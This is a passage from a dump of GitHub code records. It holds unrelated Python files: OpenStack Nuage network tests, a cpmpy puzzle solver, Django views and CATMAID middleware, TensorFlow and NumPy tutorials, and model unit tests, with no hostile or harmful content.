self.addCleanup(self.admin_networks_client.delete_network, pubnet['id'])\n fipsub_name = data_utils.rand_name('fipsub-')\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 'ip_version': 4,\n 'cidr': '160.60.0.0/24',\n 'nuage_uplink' : '111111111'}\n self.assertRaises(exceptions.BadRequest,\n self.admin_subnets_client.create_subnet,\n **kwargs) \n\n # Creation FIP subnet with same cidr and nuage_uplink should fail\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 'ip_version': 4,\n 'cidr': '172.40.0.0/24',\n 'nuage_uplink' : nuage_fipsubnet1[0]['parentID']}\n self.assertRaises(exceptions.ServerFault,\n self.admin_subnets_client.create_subnet,\n **kwargs)\n \n # Update of nuage_uplink is should not be allowed\n # Will Fail due to OPENSTACK-1083\n self.assertRaises(exceptions.BadRequest,\n self.admin_subnets_client.update_subnet,\n fipsub1['id'],\n nuage_uplink='c6166803-c4cb-40a0-805a-e42bbf4c0790')\n \n def test_fipsub_with_nuageuplink_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n\n #self.uplinksubnet\n fipsub1 = self.create_fip_subnet('172.40.0.0/24', \n self.uplinksubnet[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n \n def test_fipsub_with_uplinkID_in_file_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n # place parentID in plugin file\n # and restart the neutron\n self.add_uplink_key_to_plugin_file(self.uplinksubnet[0]['parentID'])\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n self.delete_uplink_key_from_plugin_file()\n \n def test_fipsub_create_with_uplinkID_in_plugin_file(self):\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n fipsub2 = self.create_fip_subnet('182.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub2['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.add_uplink_key_to_plugin_file(nuage_fipsubnet1[0]['parentID'])\n # create a second subnet\n fipsub3 = self.create_fip_subnet('192.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub3['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub3['id'])\n nuage_fipsubnet3 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n # check if the fipsubnet created without nuage-uplink \n # option belongs to same shared zone\n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n nuage_fipsubnet3[0]['parentID'])\n # Create a fipsubnet with nuage-uplink option\n # overriding the nuage_uplink key in ini file\n fipsub4 = self.create_fip_subnet('201.40.0.0/24',\n nuage_fipsubnet2[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub4['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub4['id'])\n nuage_fipsubnet4 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(nuage_fipsubnet2[0]['parentID'],\n nuage_fipsubnet4[0]['parentID'])\n self.delete_uplink_key_from_plugin_file()\n\n def test_multi_fipsubs_with_uplinkID_in_file_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n # place parentID in plugin file\n # and restart the neutron\n self.add_uplink_key_to_plugin_file(self.uplinksubnet[0]['parentID'])\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n fipsub2 = self.create_fip_subnet('182.40.0.0/24')\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub2['id'], nuage_fipsubnet2[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet2[0]['parentID'])\n # delete all the fipsubnets and create a new one\n self.delete_fip_subnet(fipsub1['id'])\n self.delete_fip_subnet(fipsub2['id'])\n \n #create a third fipsubnet\n fipsub3 = self.create_fip_subnet('192.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub3['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub3['id'])\n nuage_fipsubnet3 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub3['id'], nuage_fipsubnet3[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet3[0]['parentID'])\n\n self.delete_uplink_key_from_plugin_file()\n\n","repo_name":"greenpau/nuage-tempest","sub_path":"nuagetempest/thirdparty/nuage/test_nuage_uplink_fipsubnet_connectivity_model.py","file_name":"test_nuage_uplink_fipsubnet_connectivity_model.py","file_ext":"py","file_size_in_byte":17169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6954878560","text":"\"\"\"\nMrs Timkin's Age problem in cpmpy.\n\nFrom \nhttp://www.comp.nus.edu.sg/~henz/projects/puzzles/arith/index.html\n'''\nMrs Timpkin's Age from 'Amusements in Mathematics, Dudeney', number 43.\n\nWhen the Timpkinses married eighteen years ago, Timpkins was three\ntimes as old as his wife, and today he is just twice as old as she.\nHow old is Mrs. Timpkin? \n'''\n\nAnswer:\n Mr. Timpkin age: 72\n Mrs Timpkin age: 36\n\nModel created by Hakan Kjellerstrand, hakank@hakank.com\nSee also my cpmpy page: http://www.hakank.org/cpmpy/\n\n\"\"\"\nimport sys\nimport numpy as np\nfrom cpmpy import *\nfrom cpmpy.solvers import *\nfrom cpmpy_hakank import *\n\n\n\n\ndef timpkin(married_years_ago_fixed=0):\n \n model = Model()\n\n\n # variables\n # At least 18 years old\n t = intvar(18,100,name=\"Mr. Timpkin age\")\n w = intvar(18,100,name=\"Mrs Timpkin age\")\n \n # This could - of course - be a constant (18)\n # but it might interesting/funny/instructive \n # to also let it be a decision variable.\n # Note that this will give non-legal (in legal terms)\n # marriages if we don't restrict the domains above.\n married_years_ago = intvar(0,100,name=\"Married years ago\")\n if married_years_ago_fixed > 0:\n model += (married_years_ago == married_years_ago_fixed)\n \n model += (t - married_years_ago == 3 * (w - married_years_ago))\n model += (t == 2*w)\n\n def print_sol():\n print(\"t:\",t.value(), \"w:\",w.value())\n\n ss = CPM_ortools(model)\n num_solutions = ss.solveAll(display=print_sol)\n print(\"num_solutions:\", num_solutions) \n\n\nprint(\"The stated puzzle:\")\ntimpkin(18)\nprint()\nprint(\"No fixed marriage-when-ago age:\")\ntimpkin()\n","repo_name":"hakank/hakank","sub_path":"cpmpy/timpkin.py","file_name":"timpkin.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"7"} +{"seq_id":"15234588271","text":"#This script was written by SigmaRelief\n#Version 1.0.0 2020-06-22\n#https://github.com/SigmaRelief/SOLIDWORKS-Export-to-Mesh\n\n# importing required modules \nfrom zipfile import ZipFile\nimport io\nimport os\nimport tempfile\nimport sys \n\ndef updateZip(zipname, filename, data):\n # generate a temp file\n tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))\n os.close(tmpfd)\n\n # create a temp copy of the archive without filename \n with ZipFile(zipname, 'r') as zin:\n with ZipFile(tmpname, 'w') as zout:\n zout.comment = zin.comment # preserve the comment\n for item in zin.infolist():\n if item.filename != filename:\n zout.writestr(item, zin.read(item.filename))\n\n # replace with the temp archive\n os.remove(zipname)\n os.rename(tmpname, zipname)\n\n # now add filename with its new data\n with ZipFile(zipname, 'a') as zf:\n zf.writestr(filename, data)\n\n\n#variables\nfile_path = sys.argv[1]\nfile_name = os.path.basename(file_path)\ninner_file_path = \"3D/\"\ninner_file_name = \"3dmodel.model\"\n\nwith ZipFile(file_path, 'r') as archive:\n\n with io.TextIOWrapper(archive.open(inner_file_path + inner_file_name), encoding=\"utf-8\") as f:\n f_content = f.readlines()\n\n #calculated variables\n sizeoflist = len(f_content)\n\n body_count = 0\n body_id = 1\n file_name_noex = file_name[:-4]\n\n #count number of bodies in file\n for i in range(sizeoflist):\n line = f_content[i]\n body_count = body_count + line.count(\"\"\" name=\"body\"\"\")\n\n #loop through entire file to replace name\n for i in range(sizeoflist):\n match_start = 0\n line = f_content[i]\n\n #check for matches\n while match_start >= 0:\n match_start = line.find(\"\"\" name=\"body\"\"\")\n match_end = line.find(\"\"\"\" \"\"\", match_start + 8)\n\n #if multiple bodies edit line\n if match_start > 0 and body_count > 1:\n line = line[0:match_start + 7] + file_name_noex + \"-\" + str(body_id) + line[match_end:]\n body_id += 1\n\n #if single body edit line\n if match_start > 0 and body_count == 1:\n line = line[0:match_start + 7] + file_name_noex + line[match_end:]\n\n #store edited line\n f_content[i] = line\n\nformat_content = (\"\".join(f_content))\nformat_content = format_content.replace(\"\\n\", \"\\r\\n\")\n\nupdateZip(file_path, inner_file_path + inner_file_name, format_content)","repo_name":"SigmaRelief/SOLIDWORKS-Export-to-Mesh","sub_path":"Export to Mesh.py","file_name":"Export to Mesh.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"14767811247","text":"import torch\nimport numpy as np\nfrom datetime import datetime\n\ndef LOG_INFO(msg):\n now = datetime.now()\n display_now = str(now).split(' ')[1][:-3]\n print(display_now + ' ' + msg)\n\ndef load_train_data(index):\n fx = 'data/train_x{}.npy'.format(index)\n fy = 'data/train_y{}.npy'.format(index)\n train_x = np.load(fx)\n train_y = np.load(fy)\n return train_x,train_y\n\ndef load_test_data():\n test_x = np.load('data/test_x2.npy')\n test_y = np.load('data/test_y2.npy')\n test_x = np.load(fx)\n test_y = np.load(fy)\n return test_x,test_y\n\ndef read_train_name(index):\n with open('data/train_name{}.yaml'.format(index),'r') as f:\n train_name = yaml.load(f)\n return train_name\n\ndef read_test_name():\n with open('data/test_name.yaml','r') as f:\n test_name = yaml.load(f)\n return test_name","repo_name":"llk2why/RetinaSample","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"28044155759","text":"def is_square(vertices):\r\n if (len(vertices) != 4): return False\r\n else: \r\n \tedge = points_distance(vertices[0], vertices[1])\r\n \tif(edge != points_distance(vertices[0], vertices[3])): return False\r\n \telif(edge != points_distance(vertices[1], vertices[2])): return False\r\n \telif((edge*2**0.5) != points_distance(vertices[0], vertices[2])): return False\r\n \telse: return True\r\n\r\n\r\ndef get_area(vertices):\r\n area = 0\r\n for x in range(0, len(vertices)):\r\n \tarea+=(vertices[x][0]*vertices[(x+1)%len(vertices)][1]-vertices[x][1]*vertices[(x+1)%len(vertices)][0])\r\n area = abs(area/2)\r\n if(area == 0): area = int(area)\r\n return area\r\n\r\n\r\ndef points_distance(a, b):\r\n c = ((a[0]-b[0])**2 + (a[1]-b[1])**2)**0.5\r\n return c\r\n\r\n\r\ndef verticify(line):\r\n braceless = line.replace(\"(\", \"\").replace(\")\", \"\")\r\n pairs = braceless.split(\" \")\r\n tuples = [(x.split(\",\")) for x in pairs]\r\n numbers = [(int(x), int(y)) for x,y in tuples]\r\n return numbers\r\n\r\ndef process(input_path, output_path):\r\n file_in = open(input_path, \"r\")\r\n file_out = open(output_path, \"w\")\r\n same_square = False\r\n list_sizes = []\r\n for line in file_in:\r\n \tx = verticify(line)\r\n \tfile_out.write(str(get_area(x)) + \"\\n\")\r\n \tif(is_square(x) == True):\r\n \t\tif(get_area(x) == y for y in list_sizes): same_square = True\r\n \t\telse: list_sizes.append(get_area(x))\r\n file_out.write(str(same_square))\r\n file_out.close()\r\n file_in.close()\r\n\r\nprocess('input.txt', 'output.txt')\r\n","repo_name":"Spodah/pythonpractices","sub_path":"polygon_area.py","file_name":"polygon_area.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73072020702","text":"from django.shortcuts import redirect\nfrom django.views.generic import TemplateView\nfrom django.core.mail import send_mail\nfrom reservation.models import RoomModel\nfrom django.db.models import Max\n\n\nclass IndexView(TemplateView):\n template_name = 'main/index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['max_peoples'] = range(0, int(RoomModel.objects.aggregate(Max('max_people'))['max_people__max'])+1)\n context['room_type'] = ['Basic', 'Premium']\n return context\n\n\ndef contact_message(request):\n if request.method == 'POST':\n name = request.POST['name']\n email = request.POST['email']\n message = request.POST['message']\n message = f\"Сообщение от {name} - {email} \\n {message} \"\n send_mail('Contact message',\n message,\n 'grekovdima7@gmail.com',\n ['grekovdima7@gmail.com'])\n return redirect('main:index')\n","repo_name":"DmitriiGrekov/delux_hotel","sub_path":"deluxhotel/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23781121616","text":"\"\"\"djangoProject URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom projectApp import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\n\r\nurlpatterns = [\r\n\r\n\r\n # links pages\r\n path('admin/', admin.site.urls),\r\n path('', include('projectApp.urls')),\r\n path(\"flower/daisy/\", views.DaisyInformation, name=\"daisyInformation\"),\r\n path(\"flower/blanketFlower/\", views.BlanketFlower, name=\"blanketflower\"),\r\n path(\"flower/buttercup/\", views.Buttercup, name=\"buttercup\"),\r\n path(\"flower/carnation/\", views.Carnation, name=\"carnation\"),\r\n path(\"flower/dandelion/\", views.Dandelion, name=\"dandelion\"),\r\n path(\"flower/cornpoppy/\", views.CornPoppy, name=\"cornpoppy\"),\r\n path(\"flower/lotus/\", views.Lotus, name=\"lotus\"),\r\n path(\"flower/marigold/\", views.Marigold, name=\"marigold\"),\r\n path(\"flower/sunflower/\", views.Sunflower, name=\"sunflower\"),\r\n path(\"flower/rose/\", views.Rose, name=\"rose\"),\r\n path('flower/upload/', views.upload_file, name=\"uploader\"),\r\n path('display/', views.filter, name=\"display\"),\r\n\r\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\nif settings.DEBUG:\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"buchita/djangoPythonAnywhere","sub_path":"djangoProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3288911435","text":"'''\n 将元组列表转换为ndarray\n'''\n\nimport numpy as np\n\nx = [(1, 2, 3), (4, 5)]\na = np.asarray(x)\nprint(a)\nprint(\"--------------------\")\n\ny = [1, 2, 3]\nb = np.asarray(y, dtype=float)\nprint(b)\n","repo_name":"Guangxingtianxia/numpy_study","sub_path":"从已有的数组创建数组/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2644895994","text":"# tensorflow gitbook tutorial\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# load mnist data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n# it makes only one layer\n# x is data: None rows(depends on the num of mnist data) with 784(28 * 28) columns\nx = tf.placeholder(tf.float32, [None, 784])\n\n# W is a parameter place: weight\nW = tf.Variable(tf.zeros([784, 10]))\n# b is a bias\nb = tf.Variable(tf.zeros([10]))\n\n# y is an answer from our layer\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n# Y_ is a right answer label\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# cross_entropy holds information of how bad the result is\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n# uses Gradient Descent strategy with 0.5 learning rate to minimize cross_entropy\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n# initialize variables of tensorflow\ninit = tf.global_variables_initializer()\n\n# make a ssesion\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(1000):\n # take 100 data randomly\n batch_xs, batch_ys = mnist.train.next_batch(100)\n # then train with this mini batch of 100 data\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n# array of true or false\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n\n# array of true or false is casted to array of integer that then can be reduced to make a mean value\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"brightparagon/learn-machine-learning","sub_path":"tensorflow-tutorial/mnist/begin_mnist.py","file_name":"begin_mnist.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7871286142","text":"from pytorch_lightning import LightningModule\n\nfrom .classification_training import ClassificationTraining\nfrom .segmentation_training import SegmentationTraining\n\nmodules = [\n SegmentationTraining,\n ClassificationTraining,\n]\nmodules_dict = {m.__name__: m for m in modules}\n\n\ndef get_training_module(module_name: str) -> LightningModule:\n assert (\n module_name in modules_dict.keys()\n ), f\"{module_name} not in {modules_dict.keys()}\"\n return modules_dict[module_name]\n","repo_name":"POSTECH-CVLab/NeRF-Downstream","sub_path":"co3d_3d/src/modules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} +{"seq_id":"37169967305","text":"import numpy as np \n\nfrom cmsis_stream.cg.scheduler import *\nfrom cmsis_stream.cg.yaml import *\n\n\nclass Processing(GenericNode):\n def __init__(self,name,outLength):\n GenericNode.__init__(self,name)\n self.addInput(\"i\",CType(Q15),outLength)\n self.addOutput(\"o\",CType(Q15),outLength)\n\n @property\n def typeName(self):\n return \"Processing\"\n\n\nBUFSIZE=128\n### Define nodes\nsrc=VHTSource(\"src\",BUFSIZE,0)\nprocessing=Processing(\"proc\",BUFSIZE)\nsink=VHTSink(\"sink\",BUFSIZE,0)\n\n\ng = Graph()\n\ng.connect(src.o, processing.i)\ng.connect(processing.o, sink.i)\n\n\n\nprint(\"Generate graphviz and code\")\n\n\n\nconf=Configuration()\nconf.CMSISDSP = True\n\nexport_graph(g,\"graph.yml\")\nexport_config(conf,\"config.yml\")\n\nwith open(\"pre_schedule_test.dot\",\"w\") as f:\n g.graphviz(f)\n \nsched = g.computeSchedule(conf)\nprint(\"Schedule length = %d\" % sched.scheduleLength)\nprint(\"Memory usage %d bytes\" % sched.memory)\n\n\nsched.pythoncode(\".\",config=conf)\n\nwith open(\"test.dot\",\"w\") as f:\n sched.graphviz(f)\n\n","repo_name":"ARM-software/CMSIS-Stream","sub_path":"Examples/example7_python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"9122329828","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport cProfile\nimport pstats\nimport logging\n\nfrom traceback import format_exc\nfrom datetime import datetime\n\nfrom django.http import JsonResponse, Http404\nfrom django.conf import settings\n\nfrom guardian.utils import get_anonymous_user\n\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.exceptions import APIException\n\nfrom catmaid.error import ClientError\n\nfrom io import StringIO\n\n\nlogger = logging.getLogger(__name__)\n\nclass AuthenticationHeaderExtensionMiddleware(object):\n \"\"\"\n CATMAID uses the `X-Authorization` HTTP header rather than `Authorization`\n to prevent conflicts with, e.g., HTTP server basic authentication.\n\n Have Django overwrite the `Authorization` header with the `X-Authorization`\n header, if present, so that other middlewares can work normally.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n auth = request.META.get('HTTP_X_AUTHORIZATION', b'')\n if auth:\n request.META['HTTP_AUTHORIZATION'] = auth\n return self.get_response(request)\n\n\nclass CsrfBypassTokenAuthenticationMiddleware(object):\n \"\"\"\n Authenticate a user using a HTTP_AUTHORIZATION header token provided by\n Django Rest Framework's authtoken. If successful, set a protected request\n property to make Django's CSRF view middleware not enforce the presence\n of a CSRF header.\n\n This is necessary to have DRF's token authentication work both with its\n API views and normal Django views.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n try:\n token_auth = TokenAuthentication().authenticate(request)\n if token_auth:\n request.user = token_auth[0]\n request.auth = token_auth[1]\n request._dont_enforce_csrf_checks = True\n request._is_token_authenticated = True\n except:\n pass\n\n return self.get_response(request)\n\n\nclass AnonymousAuthenticationMiddleware(object):\n \"\"\" This middleware class tests whether the current user is the\n anonymous user. If so, it replaces the request.user object with\n Guardian's anonymous user and monkey patchs it to behave like\n Django's anonymou user.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n if request.user.is_anonymous:\n request.user = get_anonymous_user()\n return self.get_response(request)\n\n\nclass AjaxExceptionMiddleware(object):\n \"\"\"Catch exceptions and wrap it in a JSON response.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n return self.get_response(request)\n\n def process_exception(self, request, exception):\n response = {\n 'error': str(exception),\n 'detail': format_exc(),\n 'type': type(exception).__name__,\n 'meta': getattr(exception, 'meta', None),\n }\n if settings.DEBUG:\n import sys\n import traceback\n (exc_type, exc_info, tb) = sys.exc_info()\n response['info'] = str(exc_info)\n response['traceback'] = ''.join(traceback.format_tb(tb))\n\n # Some CATMAID errors have a more detailed status code\n if isinstance(exception, ClientError):\n status = exception.status_code\n elif isinstance(exception, Http404):\n status = 404\n elif isinstance(exception, APIException):\n status = exception.status_code\n elif isinstance(exception, ValueError):\n # Value errors are assumed to be problems with the request/client.\n status = 400\n else:\n status = 500\n\n return JsonResponse(response, status=status, safe=False)\n\n\nclass BasicModelMapMiddleware(object):\n \"\"\"Redirect requests to stacks and projects to alternative models that will\n fetch information from other sources. If the url_prefix field is set, it is\n prepended to request URLs.\n \"\"\"\n\n url_prefix = ''\n stack_info_pattern = re.compile(r'^/.+/stack/.+/info$')\n stacks_pattern = re.compile(r'/.+/stacks')\n datastores_pattern = re.compile(r'/client/datastores/.*/')\n annotations_patterns = re.compile(r'/.+/annotations/')\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n new_path = (request.path == '/projects/') or \\\n self.stack_info_pattern.search(request.path) or \\\n self.stacks_pattern.search(request.path) or \\\n self.datastores_pattern.search(request.path) or \\\n self.annotations_patterns.search(request.path)\n\n\n if new_path:\n request.path_info = self.url_prefix + request.path_info\n request.path = self.url_prefix + request.path\n\n return self.get_response(request)\n\n\nclass JaneliaRenderMiddleware(BasicModelMapMiddleware):\n \"\"\"Let this middleware redirect requests for stacks and projects to\n Janelia render web service models.\n \"\"\"\n\n url_prefix = '/janelia-render'\n\n\nclass DVIDMiddleware(BasicModelMapMiddleware):\n \"\"\"Let this middleware redirect requests for stacks and projects to a DVID\n instance.\n \"\"\"\n\n url_prefix = '/dvid'\n\n\nclass ProfilingMiddleware(object):\n \"\"\"This middleware will create a cProfile log file for a view request if\n 'profile' is part of the request URL, which can be done by simply attaching\n '?profile' to a regular view URL. Returned is a JsonResponse object,\n containing the original data and the profile. Optionally, if the request has\n a field called 'profile-to-disk', the profile is saved to a file in /tmp,\n with a name following the pattern 'catmaid-hostaddress-timestamp.profile'.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n # This middleware conflicts with expected unit test results. Warn about\n # this if this is executed in test mode.\n if getattr(settings, 'TESTING_ENVIRONMENT', False):\n logger.warning(\"The ProfilingMiddleware is used during testing. \"\n \"This will result in boken tests, because of unexpected \"\n \"response content.\")\n\n def __call__(self, request):\n profile = 'profile' in request.GET or 'profile' in request.POST\n\n no_content = False\n if profile:\n no_content = 'profile-no-content' in request.GET or \\\n 'profile-no-content' in request.POST\n request.profiler = cProfile.Profile()\n request.profiler.enable()\n\n response = self.get_response(request)\n\n if profile:\n request.profiler.disable()\n s = StringIO()\n sortby = getattr(request, 'profile-sorting', 'cumulative')\n ps = pstats.Stats(request.profiler, stream=s).sort_stats(sortby)\n ps.print_stats()\n data = {\n 'profile': s.getvalue()\n }\n if not no_content:\n data['content'] = response.content\n\n response = JsonResponse(data)\n\n if hasattr(request, 'profile-to-disk'):\n request.profiler.dump_stats(f'/tmp/catmaid-{request.META[\"REMOTE_ADDR\"]}-{datetime.now()}.profile')\n\n return response\n\n\nclass NewRelicMiddleware(object):\n \"\"\"This middleware will log additional properties to New Relic and expects\n the newrelic python module to be installed.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n # Import this locally, so that we don't clutter general imports and require\n # it only when it is used.\n self.newrelic = __import__('newrelic.agent')\n\n def __call__(self, request):\n exec_ctx = request.META.get('HTTP_X_CATMAID_EXECUTION_CONTEXT', b'')\n if not exec_ctx:\n exec_ctx = 'unknown'\n self.newrelic.agent.add_custom_parameter('execution_context', exec_ctx)\n\n return self.get_response(request)\n","repo_name":"catmaid/CATMAID","sub_path":"django/applications/catmaid/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"7"} +{"seq_id":"41659819408","text":"#!/usr/bin/python3\n\"\"\"This module define unittest for Square\n\"\"\"\n\n\nfrom unittest import TestCase\nfrom models.square import Square\n\n\nclass SquareTest(TestCase):\n \"\"\"Test suit for Square class\n \"\"\"\n\n def test_size_is_height_and_width(self):\n square = Square(4)\n self.assertEqual(square.size, square.height)\n self.assertEqual(square.width, square.height)\n\n def tests_square_string_representation(self):\n square = Square(5, 7, 9, id=10)\n sqr_str = '[Square] (10) 7/9 - 5'\n self.assertEqual(str(square), sqr_str)\n\n def test_square_size_setter_getter(self):\n square = Square(5, 7, 9, id=10)\n self.assertEqual(square.size, 5)\n square.size = 10\n self.assertEqual(square.size, 10)\n\n def test_square_size_with_wrong_value(self):\n square = Square(5, 7, 9, id=10)\n\n with self.assertRaises(TypeError) as err:\n square.size = \"5\"\n self.assertEqual(\n str(err.exception),\n \"width must be an integer\"\n )\n\n with self.assertRaises(ValueError) as err:\n square.size = -5\n self.assertEqual(\n str(err.exception),\n \"width must be > 0\"\n )\n\n def test_square_update_args(self):\n sqr = Square(5, 7, 3, 22)\n sqr.update(9)\n self.assertEqual(sqr.id, 9)\n sqr.update(9, 4)\n self.assertEqual(sqr.size, 4)\n sqr.update(9, 4, 10)\n self.assertEqual(sqr.x, 10)\n sqr.update(9, 4, 10, 8)\n self.assertEqual(sqr.y, 8)\n\n def test_square_update_kwargs(self):\n sqr = Square(11, 3, 2, 13)\n sqr.update(id=20)\n self.assertEqual(sqr.id, 20)\n sqr.update(size=21)\n self.assertEqual(sqr.size, 21)\n sqr.update(x=7, y=18)\n self.assertEqual(sqr.x, 